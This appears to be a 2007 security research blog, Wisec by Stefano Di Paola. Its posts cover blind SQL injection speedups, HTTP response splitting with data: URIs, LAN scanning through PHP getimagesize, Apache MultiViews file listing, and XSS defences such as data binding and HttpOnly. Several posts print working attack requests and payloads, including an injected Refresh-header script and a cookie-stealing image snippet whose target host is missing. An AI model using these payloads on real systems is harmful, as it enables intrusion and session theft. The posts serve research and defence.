THP Wisec USH DigitalBullets TheHackersPlace network
The WIse SECurity
Wisec Home SecSearch Projects Papers Security Thoughts
News Search on Wisec

Security Thoughts


Monday, December 03, 2007, 21:21

ExploitMe Tools - A Little Warning

Few days ago two interesting new tools were released and donated to the sec-community, XSSMe and SQLiMe by Security Compass.
From site:

XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS) vulnerabilities.
What is Exploit-Me?
A suite of Firefox web application security testing tools.
Exploit-Me tools are designed to be lightweight and easy to use.
Instead of using proxy tools like many web application testing tools, Exploit-Me integrates directly
with Firefox.

Ok. This is the good tale about it.

The problem is that XSSMe attack patterns use as external source www.securitycompass .com:

<SCRIPT a=">'>" SRC="">

and this should not happen, or, at least XssMe should ask the user to change to a custom server.
Why? Because if you're doing some Ethical Hacking activity using XssMe for automated testing, whenever the victim host would have a Xss, web server would get a request like the following:

GET /xss.js HTTP/1.1
User-Agent: Firefox/
Connection: keep-alive

Do you see? The referrer header is a great resource for statistics, and supposing you're doing the testing under some NDA you're almost screwed.

So in order to resolve this issue, i exported the xss attacks to xml, replaced to my local server, deleted every pattern from the option dialog and imported the replaced xss.xml.
Even though I really think this was due to an oversight, if anyone intends to use XssMe, fix it by yourself, or use it at your own risk!

Q: Did you reported this issue to Security Compass?
A: Yes. They added a known issues link with the description of the problem.



Monday, November 05, 2007, 22:54

Bursting Performances in Blind SQL Injection - Take 2 (Bandwidth)

Today my colleague Giorgio Fedon of Minded Security, talked me about an idea regarding how to save bandwidth while exploiting blind SQL Injection.
His question was:

"When a pentester is trying to get the content of a DB by exploiting a blind injection how can s/he get the content-length header without effectively getting all
the response body, so that s/he can save time and bandwidth?"

My answer was: "use HEAD! (in both senses :)"
It came out that RFC says it's not possible to use it.
Infact, Apache doesn't satisfy a HEAD request with Content-Length header in response.

HEAD /index.php HTTP/1.1
Accept: */*

HTTP/1.1 200 OK
Date: Mon, 05 Nov 2007 21:00:07 GMT
Server: Apache
Content-Type: text/html

See? no Content-Length in response even if my localhost home page is 90 bytes long (as Rfc suggests).
Let's try it with Range header:

GET /index.php HTTP/1.1
Accept: */*
Range: bytes=-1

HTTP/1.1 206 Partial Content
Date: Mon, 05 Nov 2007 21:03:15 GMT
Server: Apache
Content-Range: bytes 89-89/90
Content-Length: 1
Content-Type: text/html

Ahhhh, so the Range header in a request will fullfill my request without sending me the whole body but with a Content-Range which shows me how big would be the body itself.

Unfortunately, not all Web Servers acts the same.
IIS 6.0 doesn't follow HTTP 1.1 Rfc and simply sends the whole body in response to GET or POST requests.
But..Yes there is a but.
HEAD requests are fullfilled with the right Content-Length:

HEAD /search.aspx HTTP/1.1
Accept: */*
Content-Length: 22


HTTP/1.1 200 OK
Date: Mon, 05 Nov 2007 21:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4790
Content-Type: text/html
Expires: Mon, 05 Nov 2007 21:14:00 GMT
Cache-control: private

This means that we get the length of the response body even when there's no body in response.

How to use these infos?
By improving blind sql injection tools.

Often blind sql injection tools use the differences in response bodies to understand if the sql injection accomplishes a true or false response.
Using Content-Length or Content-Range could improve performances a lot.

The following look up table is for server and method:



We (me and Giorgio) hope some reader will provide informations about other web servers.



Thursday, November 01, 2007, 23:29

HTTP Response Splitting and Data: URI scheme in Firefox

After having read Pdp's point of view about data: uri scheme on Firefox, here's another reason why Mozillla developers should stop propagating data uri to the initiating parent site.

It is known that Meta Http-equiv='Refresh' tag could be exploited to inject javascript using data:.
It's also known that Refresh is a Http header and that it has security matters as clearly explained by Amit Klein.
By taking all these stuff together, it will result that Http Response Splitting, could be used to inject Refresh: header and directly XSS the redirecting site.
Let's suppose there's a redirection on which acts like the following:

GET /redirect.jsp?redir=http:// spamsite. com HTTP/1.0

HTTP/1.1 302 Found
Date: Thu, 01 Nov 2007 21:40:23 GMT
Location: http:// spamsite. com
Transfer-Encoding: chunked
Content-Type: text/html

In case this script also suffers from a Http Response Splitting, an attacker could easily inject Refresh: with data: uri.

GET /redirect.jsp?redir=data:blah%0aRefresh:+0%3b+url%3ddata:text/html%3b,<script>js</script> HTTP/1.0

HTTP/1.1 302 Found
Date: Thu, 01 Nov 2007 21:40:23 GMT
Location: data:blah
Refresh: 0; url=data:text/html;,<script>js</script>
Transfer-Encoding: chunked
Content-Type: text/html

Firefox will happily execute it in the context of the redirector.

[ No comments ]


Friday, October 05, 2007, 17:47

Optimizing the number of requests in blind SQL injection

Blind injection is often considered as an On/Off binary research accomplished using the bisection algorithm.
When the bisection algorithm is applied the complexity is O(Log2 n) where n is in the case of the extended ASCII character set is 255.
So for each character at a given position 'p' the total number of requests will be:

Log2 n = Log2 255 = ~7

So if the lenght of the information to be retrieved is 8,
the total number of requests to be sent is

8 * Log2 255 = 56

Let's suppose now, there is the following situation:


where page.jsp is a script which loads dinamically content by using the SQL query:

qry= "Select content from pages where id="+Request.value("id");

Let's suppose the rest of the application gives no clue about SQL errors or the possibility to use other tricks in order to force the web application to display the informations we want.
This is a classical Blind SQL Injection case.

But what happens if by changing 'id' values results displaying different pages?

The attacker could use the different responses in order to map the results of an injected conditional sql statement.

That is.
Let's suppose there are more than 255 values for the 'id' parameter

"http:// vi.ctim/page.jsp?id=1"
"http:// vi.ctim/page.jsp?id=2"

then let's map every single snippet of unique text content for every request.
Then by setting

For (pos = 1; pos<LEN(@@version)){
idval="(CASE substr(@@version,"+pos+",1)
   when char(1) then 1
   when char(2) then 2
   when char(3) then 3
   when char(4) then 4
   when char(4) then 5
   end )"
get response for:

the attacker will have to accomplish only


requests, because for every request the application will return the page mapped to the character value.

Now, this is the best case.
For every character value exists a single id value.

There could be a number of id values which is less than 255
(or # printable chars for non binary information).

Let's suppose there exist only 4 unique id values corresponding to 4 unique responses.
Then the injected query will be (in pseudo code):


if(res>191 and res<255)
  then 1
else if(res>127 and res<192)
  then 2
else if(res>63 and res<128)
  then 3

For each result, the set of values we are analysing will be 1/4 of the previous set.

This algorithm has O(Log4 255), which will correspond to

LEN*Log4 255 = LEN*3.9

requests to be sent.

The worst case is the On/Off bisection algorithm already described in several papers.

I don't have the time to implement it now, but I hope to see some tool with this (maybe) new approach in it:)



Wednesday, August 29, 2007, 17:24

Scanning internal Lan with PHP remote file opening.

Even if some website is still vulnerable to remote file inclusion (RFI), this is becoming a quite rare scenery.
Nonetheless, much more often it happens that some of the php functions allowing http or ftp protocol wrappers are exposed to user control.
A perfect example for this tecnique is a fully controlled getsizeimage() function with allow_url_fopen.
No RFI, no data returned, it could be just used for DoS.


Obviously there's no RFI, and until yesterday probably nobody would care about check,inspect or exploit it. This article explains that some kind of attack could still be accomplished:

Lan scanning and Drive by Pharming with error matching or time analisys.

If the php error display is set to On, a simple request like:

will display:

Warning: getimagesize( failed to open stream:
Connection refused in...

This means it's a closed port.

Indeed, an open port will be displayed as:

Warning: getimagesize( failed to open stream:
HTTP request failed!...

ftp :// protocol could obviously be used, too.

If there's no error on output, timing attacks could be accomplished too.

Infact we could get timing result if a port is closed:

real 0m0.057s
user 0m0.032s
sys 0m0.020s

Or if a port is opened :

real 0m5.095s
user 0m0.032s
sys 0m0.020s

So, what can be done?

If the right conditions are satisfied:
1. Drive By Pharming
2. Bruteforcing routers.
3. Full Lan Scan.

Last, Ascii wrote a nice php script for Lan Scan.
You can find it here...

Ah... did I mentioned that php remote file supports HTTP Basic Authentication? :)

As usual, the next move is up to you

[ No comments ]


Friday, August 17, 2007, 13:13

Preventing XSS with Data Binding

It's almost a couple of months that i'm researching and studying about how to implement the concept of Prepared Statements used in SQL Language, on Html in order to prevent XSS.
I asked Pdp, RSnake, Jeremiah Grossman, Kuza55, Romain Gaucher and some other researcher to have a look at it and to give me some feedback.

The raw Proof of Concept could be found here.

Here's some (technical) content of the mail i sent to some of them:


The idea is about using something like prepared statements in SQL applied to Html which could be used to prevent XSS as PS-SQL are to prevent SQL injection.

Infact, server side filtering is often home made and moreover it doesn't cover all the stuff browsers are able to parse as well as proprietary well known interpretations of Html.

How this could be accomplished?
By separating html trusted data from untrusted data.
My idea is that semantical separation could be a good way to let browsers do validation/sanitization.

An example of semantical separation could be the deprecated' <plaintext> tag...because browsers parse every stuff after that as plaintext with no ending </plaintext> tag.

Even thought a more complex model could be proposed to vendors as a standard, from the client side point of view, it should be quite easy to implement some javascript code which parses and validates user data before attaching it to html.

A couple of examples follow:

Simple Text :

<bindtext id='someid'></bindtext>

with a body onload event a javascript is further executed in order to :
1. Get the text after plaintext tag and parse it as an associative array
id => userdata
2. find all bindtext tags and use the
tag.appendChild(document.createTextNode(binding['id']) );


Altought attributes are more complex, by relying on data binding, I think, every attribute could be checked and sanitized with some preprocessing stage.

A simple href/src attribute check could be something like adding a new attribute named 'bindattr' like the following:

<a bindattr='href=ref|' > Click here </a>

and then using javascript to get the parsed internal protocol by using HtmlAnchorElement:

function getProtocol(url){
var a = document.createElement('A');
return a.protocol;

so, as the protocol is the client side parsed one, it will be returned the "real" protocol ready to be checked and validated from client side.

These are, obviously, just examples of what could be done by taking advantage of Data binding and a preprocessing stage, anyway you could check every client/server side control i've implemented by looking at the source files linked on test.php.

I am planning to release a paper(as Minded Security) about this research on september.

Moreover i think it could be created a community based forum, if that idea is interesting fot a bunch of people, in order to implement a 360 degree client side validation engine.

Last, it would just stop only 80% of XSS (DOM Based XSS is on another level) but i think that if it would be implemented at browser code level, as a standard that would be some good interesting new methodology for XSS prevention.


I also added style preprocessing code and some idea to preprocess untrusted data when dealing with mixed Html.

Even if i was planning to release a paper for Minded Security ( on early september, RSnake posted a blog
entry probably in order to start some early discussion before i could write a complete, exaustive paper about this technique.
Well, the discussion started and it's already very interesting.
Kuza55 (a real browser hacker;) found a way to take advantage of the custom charset feature in order to stop plaintext markup to work and let the untrusted data to be parsed!
There are several workaround for this but i would like to use the most elegant and practical :)
Update: I used three plaintext markups in order to fix the issue. It's not so elegant but it should work.

Dean Brettle has already tried to add some contribute with an alternative solution using document.write in place of plaintext markup.

Next blog entry will be about some more technical details and workarounds.

Last, i ask you to have a bit of patience until early september when i'll release a more exhaustive paper, as the real will with this approach would be to write a proposal for a standard.

It seems there's no peace ... even when I'm on vacation. :)

[ No comments ]


Saturday, July 14, 2007, 17:26

Multiviews Apache, Accept Requests and free listing

This is a small post about a way to easily get backup files on Apache web servers with MultiViews option enabled.
I really don't know if this is a known attack technique, but IMO it should be implemented in every web scanner and it should be added in the OWASP Testing Guide - section Information Gathering.

Let's start:

MultiViews is an Apache option which acts with the following rules:

if the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client
had asked for one of them by name. It then chooses the best match to the client's requirements.

How the best match is chosen by Apache?
It depends on several Accept* headers in the client Request.


Let's see how it works:

Let's suppose i just saved an backup copy of my index.php on a Web Server with the MultiView option enabled.

If an attacker requests "index" without any extension:

GET /index HTTP/1.1
Host: myhost
Accept: */*

the web server will reply with:

HTTP/1.1 200 OK
Date: Sat, 14 Jul 2007 14:46:22 GMT
Server: Apache/2.0.55 (Ubuntu)
Content-Location: index.php
Vary: negotiate,accept
TCN: choice
Last-Modified: Sat, 14 Jul 2007 10:58:38 GMT
ETag: "8d15d-0-1c1d5380;498a0540"
Accept-Ranges: bytes
Content-Length: #ofBytes
Content-Type: text/html; charset=UTF-8

Now, it could be noticed that in the server response several interesting headers are out:

Content-Location: index.php
Vary: negotiate,accept
TCN: choice

This means there is MultiViews enabled on / directory.

Let's see if in the request we use a "Accept:" header with an inexistent mime type:

GET /index HTTP/1.1
Host: myhost
Accept: application/whatever; q=1.0

the server will reply with:

HTTP/1.1 406 Not Acceptable
Date: Sat, 14 Jul 2007 14:51:29 GMT
Server: Apache/2.0.55 (Ubuntu)
Alternates: {"index.bak" 1 {type application/x-trash} {length 3}},
{"index.php" 1 {type application/x-httpd-php} {length 3}}
Vary: negotiate,accept
TCN: list
Content-Length: NNNN
Content-Type: text/html; charset=iso-8859-1

<title>406 Not Acceptable</title>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /index could not
be found on this server.</p>
Available variants:
<li><a href="index.php">index.php</a> , type text/html</li>
<li><a href="index.bak">index.bak</a> , type application/x-trash</li>

aha! With a single request we get a listing of all the files!
And for in free speech ;)

Well, ok. Not really *all* the files but every file with the same name requested and with an extension listed in mime-types file.

This means that if index.whatever is on the server it won't be listed.

Obviously an attacker could request every known extension for index.* but it would be a bit noisy, isn't it?

As usual i prefer to leave discussion open than give everything i think on the feel free to leave a comment. in free beer :)



Friday, May 18, 2007, 17:19

Owasp Conference and Flash Application Testing.

App Sec 2007 Owasp Conference was a great event.
I did a presentation about Flash Application Security.

It describes how Flash Applications are not so secure and as for every technology, ActionScript has its own bad coding practices which could lead a Flash application to be abused in order to generate XSS and a new attack vector called Cross Site Flashing.

Download the slides in Pdf or in Swf :)

Note: As the slides themselves are not always self explaining, i'll try to publish some more comprehensive details on the next blog entries.

The Best is yet to come...
Stay Tuned.



Monday, May 07, 2007, 21:57

Interview with Rain Forest Puppy

A friend of mine, Antonio `S4tan` Parata, have interviewed Rain Forest Puppy.
For those who still don't know RFP, he is one of the fathers of Web Application security and he is the author of RFPolicy.
Great, worth reading interview!

[ No comments ]


Wednesday, July 26, 2006, 18:08

HttpOnly and Firefox.

Xss vulnerabilities are often used to get cookies.
Once the attacker use xss to get cokies there are several techniques to apply such as
Session Hijacking .
A classical example to collect cookies by XSS is:

var img=new Image();

These two lines of js code, force browser to create an image and request for an image to the specified address.
If is controlled by a malicious user, *he will obtain victim's cookie without victim's authorization.
To understand how much this technique is dangerous, just think about sessions.

Some time ago Microsoft implemented, since IE 6 SP1, a new keyword to try to mitigte such problem.

How it works.
If our Web Server sends a cookie with HttpOnly attribute like the following:

Set-Cookie: Session:12345; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly

IE sees it and blocks cookie access from Javscript.
This way it's no more allowed to read the cookie from 'document.cookie' js statement.

Yes, there are ways to bypass HttpOnly. But it's really easy to block TRACE method by configuration settings so these attacks are easy to mitigate or stop at all.

Just a Little Warning: we are talking exclusively about stopping of cookies attack. Xss are far more dangerous.

Mozilla developers are stuck about this. They actually won't implement HttpOnly on Mozilla/Firefox..
Thanks to Ascii with whom some day ago we had some discussion about
blocking XSS, i went deeply into Javascript paradigms and matters.

Mozilla developers are really great, because they implemented w3c specification in a neat way.
They create a JS framework really simple and useful.
For our purpose, they implemented prototyping functions to allow web developers to define classes and object
easily and smartly (?).
Let's talk about __defineGetter__ and __defineSetter__ by applying them to cookies.


__defineGetter__ : It allows to define a function to be called (namely callback) every time the value of the variable is requested.

__defineSetter__ : It allows to define a function to be called (namely callback) every time a new value is assigned to the variable.


HTMLDocument.prototype.__defineGetter__("cookie",function (){return null;});

will block every request to document.cookie from within js.

E.g. in php:
HTMLDocument.prototype.__defineGetter__("cookie",function (){return "sorry";});

Will display an alert with "sorry" rather than our cookie original value, but internally, Mozilla/Firefox will mantain the original
cookie value internally.

And what about __defineSetter__?
It could be used to mitigate Session Fixation or other client side
cookie tampering techniques.
That is, if we don't want the cookie to be tampered from within javascript, we could use the following:

HTMLDocument.prototype.__defineSetter__("cookie",function (new){});

E.g. in php:
HTMLDocument.prototype.__defineSetter__("cookie",function (new){});

This approach however, is useless as cookies could be assigned from html by using:
<meta http-equiv="Set-Cookie" content="value=n;path=/">

Anyway if we filter out "meta" tags on user input this technique could block or at least mitigate cookie tampering via html.

Getter and Setter could be used to block functions, too, for example think about XmlHttpRequest & co.
There is, of course, a little drawback, as every access to the blocked vars and functions are denied from javascript.

Unfortunately, __defineGetter__ and __defineSetter__ aren't implemented on all browsers (read MSIE). i long for a _real_ standard js implementation on all browsers...:(

[ 1 comment ]

« 1 2 3 4 »  XML

Admin login | This weblog is from

Wisec is brought to you by...

Wisec is written and mantained by Stefano Di Paola.

Wisec uses open standards, including XHTML, CSS2, and XML-RPC.

All Rights Reserved 2004
All hosted messages and metadata are owned by their respective authors.